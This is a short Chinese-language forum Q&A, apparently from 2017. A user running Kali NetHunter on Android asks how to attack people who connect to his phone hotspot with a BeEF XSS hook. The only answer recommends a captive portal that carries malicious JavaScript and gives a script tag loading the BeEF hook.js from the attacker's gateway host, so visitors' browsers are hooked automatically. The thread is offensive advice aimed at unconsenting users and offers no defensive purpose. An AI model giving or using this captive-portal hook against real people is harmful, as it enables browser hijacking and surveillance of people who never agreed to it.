0

我在我的 android 上运行 Kali Nethunter,我可以让牛肉 xss 在它上面运行良好。js 挂钩位于http://gateway:3000/hooks.js 但我无法使用 mitmf 进行注入,因为我正在运行自己的 android 手机热点。是否有任何程序可以让我对连接到我的热点的客户端进行攻击?

4

1 回答 1

0

如果您控制热点,请在 HTML 代码中设置一个包含恶意 JS 的 Captive Portal。

例子:

<script src=”http://gateway:3000/hook.js” type=”text/javascript”&gt;</script>

这样他们必须自动钩到你;)

于 2017-10-09T14:18:54.010 回答